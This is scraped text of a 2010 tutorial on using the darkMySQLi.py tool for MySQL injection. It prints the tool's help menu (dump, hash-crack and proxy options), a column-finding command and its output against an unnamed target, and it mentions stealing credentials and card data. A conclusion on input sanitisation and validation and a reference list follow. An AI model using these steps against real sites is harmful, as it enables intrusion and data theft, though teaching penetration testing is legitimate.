MySQL Injection using darkMySQLi.py - Intelligent Exploit

MySQL Injection using darkMySQLi.py - Intelligent Exploit

MySQL Injection using darkMySQLi.py - Intelligent Exploit


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<strong>MySQL</strong> <strong>Injection</strong> <strong>using</strong> dark<strong>MySQL</strong>i.<strong>py</strong>Step 1: Finding number of columns in <strong>MySQL</strong> DatabaseTo perform SQL injection attack, I used dark<strong>MySQL</strong>i.<strong>py</strong> to attack the targeted URLabove. You must understand and know how to use dark<strong>MySQL</strong>i.<strong>py</strong> tool. If you donot understand how to use it, you can refer to the Help menu that built-in togetherwith this tool (Use dark<strong>MySQL</strong>i.<strong>py</strong> –h command to see Help menu)E:\Izhar\Tool\SQL <strong>Injection</strong>\DarkCode <strong>Exploit</strong>>dark<strong>MySQL</strong>i.<strong>py</strong> -hdark<strong>MySQL</strong>i v1.6 rsauron@gmail.comforum.darkc0de.comUsage: ./dark<strong>MySQL</strong>i.<strong>py</strong> [options]Options:-h, --helpshows this help message and exits-d, --debugdisplay URL debug informationTarget:-u URL, --url=URL Target urlMethodology:-b, --blindUse blind methodology (req: --string)-s, --stringString to match in page when the query is validMethod:--method=PUTSelect to use PUT method ** NOT WORKINGModes:--dbs Enumerate databases <strong>MySQL</strong> v5+--schemaEnumerate Information_schema (req: -D,opt: -T) <strong>MySQL</strong> v5--full Enumerate all we can <strong>MySQL</strong> v5+--info <strong>MySQL</strong> Server configuration <strong>MySQL</strong> v4+--fuzz Fuzz Tables & Columns Names <strong>MySQL</strong> v4+--findcol Find Column length <strong>MySQL</strong> v4+--dump Dump database table entries (req:-T,opt:-D,-C,--start <strong>MySQL</strong> v4+--crack=HASHCrack <strong>MySQL</strong> Hashs (req: --wordlist)--wordlist=LIS.TXT Wordlist to be used for crackingDefine:-D DB database to enumerate-T TBL database table to enumerate-C COL database table column to enumerateOptional:--sslTo use SSL--endTo use + and -- for the URLS --end "--" (Default)To use /**/ and /* for the URLS --end "/*"--rowdispDo not display row # when dumping--start=ROWRow number to begin dumping at--where=COL,VALUE Use a where clause in your dump--orderby=COL Use a orderby clause in your dump--cookie=FILE.TXT Use a Mozilla cookie file--proxy=PROXYUse a HTTP proxy to connect to the target url--output=FILE.TXT Output results of tool to this fileALL RIGHT RESERVED 2010 Page 6 of 12

<strong>MySQL</strong> <strong>Injection</strong> <strong>using</strong> dark<strong>MySQL</strong>i.<strong>py</strong>From the targeted URL that I have tested above, I found vulnerability at characterstring 22 after parameter id that will allow us to do SQL injection. So, I used thisvulnerable page (URL: to testwith dark<strong>MySQL</strong>i.<strong>py</strong> tool. Use this command to find the number of columns in thedatabase: ./dark<strong>MySQL</strong>i.<strong>py</strong> –u “URL” –findcolE:\Izhar\Tool\SQL <strong>Injection</strong>\DarkCode <strong>Exploit</strong>>dark<strong>MySQL</strong>i.<strong>py</strong> –u“" --findcol|-------------------------------------------------- || rsauron@gmail.com v1.6 || 1/2009 dark<strong>MySQL</strong>i.<strong>py</strong> ||Multi Purpose <strong>MySQL</strong> <strong>Injection</strong> Tool|| Usage: dark<strong>MySQL</strong>i.<strong>py</strong> [options] || -h help darkc0de.com ||-------------------------------------------------- |[+] URL:[+] 06:28:14[+] Evasion: + --[+] Cookie: None[+] SSL: No[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)[+] Building Proxy List...Proxy: - Success[+] Proxy List Complete[+] Attempting To find the number of columns...[+] Testing: 1, 2,3,4,5,6,7,8,9,10,[+] Column Length is: 10[+] Found null column at column #: 3,4,7,8,[!] SQLi URL:,2,3,4,5,6,7,8,9,10--[!] dark<strong>MySQL</strong>i URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--[-] 06:28:23[-] Total URL Requests: 10[-] DoneDon't forget to check dark<strong>MySQL</strong>i.logFrom the testing result above, I found a total of 10 columns for database. But,column number 3, 4, 7 & 8 are null column. From SQL Server perspective, a NULLis not a value, it only means that a value was not provided when the row wascreated. These null columns will give advantage to the attacker to test SQLinjection. The results above show SQLi URL and dark<strong>MySQL</strong>i URL. Based on thePython tool script, darkc0de function will try to concatenate supplied strings <strong>using</strong><strong>MySQL</strong> CONCAT function, test hash database, generates hex representation ofstring and other functions. From dark<strong>MySQL</strong>i URL, we can see this darkc0de willtry to test SQL injection at null columns for column number 3, 4, 7 & 8.ALL RIGHT RESERVED 2010 Page 7 of 12

<strong>MySQL</strong> <strong>Injection</strong> <strong>using</strong> dark<strong>MySQL</strong>i.<strong>py</strong>Chapter 4: Conclusiondark<strong>MySQL</strong>i.<strong>py</strong> is a good tool to find bugs, errors or vulnerabilities inMYSQL database. By <strong>using</strong> this tool, it is very easy to find SQL injectionvulnerability at certain vulnerable parameter or string. This tool also perform SQLinjection test to the vulnerable website and try to dump data from <strong>MySQL</strong>database. You can dump data from <strong>MySQL</strong> database tables and it works nicely. Youcan gather secret and confidential data such as usernames, passwords, credit cardnumbers and etc. But, I suggest <strong>using</strong> this tool in a right way. If you work as ITpeople, you can use this tool to check vulnerability in your web /database server andtry to improve its security based on vulnerability that you found <strong>using</strong> this tool.This dark<strong>MySQL</strong>i.<strong>py</strong> is very useful tool especially for IT Security Consultant toreduce time for web penetration testing with the better quality findings.To prevent SQL injection attacks, the most important actions are datasanitization and validation, which should already be in place. Sanitization usuallyinvolves running any submitted data through a function (such as <strong>MySQL</strong>'smysql_real_escape_string() function) to ensure that any dangerous characters suchas " ' ") are not passed to a SQL query in data. Validation is slightly different, inthat it attempts to ensure that the data submitted is in the form that is expected. Atthe most basic level this includes ensuring that e-mail addresses contain an "@"sign, that only digits are supplied when integer data is expected, and that thelength of a piece of data submitted is not longer than the maximum expected length.Validation is often carried out in two ways: by blacklisting dangerous or unwantedcharacters (although hackers can often get around blacklists) and by whitelistingonly those characters that are allowed in a given circumstance, which can involvemore work on the part of the programmer. Although validation may take place onthe client side, hackers can modify or get around this, so it's essential that you alsovalidate all data on the server side as well.ALL RIGHT RESERVED 2010 Page 11 of 12

<strong>MySQL</strong> <strong>Injection</strong> <strong>using</strong> dark<strong>MySQL</strong>i.<strong>py</strong>Chapter 5: References1) SQL <strong>Injection</strong>http://en.wikipedia.org/wiki/SQL_injection2) SQL <strong>Injection</strong>s Top Attack Statisticshttp://www.darkreading.com/database_security/security/appsecurity/showArticle.jhtml?articleID=2231001293) SQL <strong>Injection</strong>s Cheat Sheethttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/4) Time to Squish SQL <strong>Injection</strong>http://www.securityfocus.com/columnists/5055) SQL <strong>Injection</strong>: How To Prevent Security Flaws in PHP/<strong>MySQL</strong>http://www.learnphponline.com/security/sql-injection-prevention-mysql-php6) 10 Ways To Prevent or Mitigate SQL <strong>Injection</strong> Attackhttp://www.enterprisenetworkingplanet.com/netsecur/article.php/38667567) UK Security Breach Investigation Reporthttp://7safe.com/breach_report/Breach_report_2010.pdfALL RIGHT RESERVED 2010 Page 12 of 12

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